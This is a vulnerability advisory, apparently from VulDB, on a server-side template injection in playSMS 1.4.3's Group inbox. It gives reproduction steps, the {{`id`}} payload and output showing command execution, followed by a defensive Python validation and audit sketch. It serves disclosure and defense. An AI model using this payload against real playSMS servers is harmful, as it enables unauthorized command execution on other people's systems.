| Title | playSMS 1.4.3 Server Side Template Injection (SSTI) |
|---|
| Description | PlaySMS 1.4.3 has an authenticated Server Side Template Injection in Group inbox. Manipulation of the arguments "Receiver number" and "Description" leads to an authenticated RCE.
1. Authenticate on the login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login
2. Go to Features > Group inbox (/index.php?app=main&inc=feature_inboxgroup&op=list)
3. Click the Plus (+) icon to add a new group
4. Add the payload {{`id`}} in the "Receiver number" and "Description" fields
5. Save and go back to Features > Group inbox
We can also click the edit action to view the Description RCE
<tr><td class=label-sizer>Receiver number</td><td>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</td></tr>
<tr><td>Keywords</td><td><input type='text' name='keywords' value='' maxlength='100'><i class='glyphicon glyphicon-info-sign playsms-tooltip' data-toggle=tooltip title='Separate with comma for multiple items' rel=tooltip></i></td></tr>
<tr><td>Description</td><td><input type='text' name='description' value='uid=33(www-data) gid=33(www-data) groups=33(www-data)
' maxlength='100'></td> |
|---|
| Source | ⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/inboxgroup |
|---|
| User | Dhimitri (UID 45045) |
|---|
| Submission | 25/06/2024 01:15 (2 years ago) |
|---|
| Moderation | 03/07/2024 07:29 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 270278 [playSMS 1.4.3 Template index.php?app=main&inc=feature_inboxgroup&op=list Receiver Number Privilege Escalation] |
|---|
| Points | 20 |
|---|
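
A defensive sketch for the two fields named in the report, added here as an example and not taken from playSMS or its fix: it rejects template markers on input, escapes the description where it is rendered, and audits rows that are already stored. The function names, the phone-number rule and the sample rows are assumptions.

```python
import re
from html import escape

# Assumption: a receiver number is an optional "+" followed by 3-20 digits.
RECEIVER_RE = re.compile(r"\+?[0-9]{3,20}")
# Markers taken from the payload shown in the report: delimiters and backtick.
TEMPLATE_MARKERS = ("{{", "}}", "`")
MAX_DESCRIPTION = 100  # same limit as maxlength='100' in the form above

# Constructed sample rows (not playSMS's real schema).
SAMPLE_ROWS = [
    {"id": 1, "receiver": "+15550100", "description": "Support team"},
    {"id": 2, "receiver": "{{`id`}}", "description": "{{`id`}}"},
]


def find_template_markers(value):
    """Return the template markers present in value, in a fixed order."""
    return [m for m in TEMPLATE_MARKERS if m in value]


def validate_group_inbox(receiver, description):
    """Return {field: reason} for each rejected field; {} means accept."""
    errors = {}
    if not RECEIVER_RE.fullmatch(receiver.strip()):
        errors["receiver"] = "not a phone number"
    markers = find_template_markers(description)
    if markers:
        errors["description"] = "template markers: " + " ".join(markers)
    elif len(description) > MAX_DESCRIPTION:
        errors["description"] = "too long"
    return errors


def render_description_input(description):
    """Escape the value for the single-quoted HTML attribute it lands in."""
    return ("<input type='text' name='description' value='%s' maxlength='100'>"
            % escape(description, quote=True))


def audit_rows(rows):
    """Return ids of already-stored rows that contain template markers."""
    return [r["id"] for r in rows
            if any(find_template_markers(str(v)) for k, v in r.items() if k != "id")]


if __name__ == "__main__":
    print(validate_group_inbox("{{`id`}}", "{{`id`}}"))
    print(audit_rows(SAMPLE_ROWS))
```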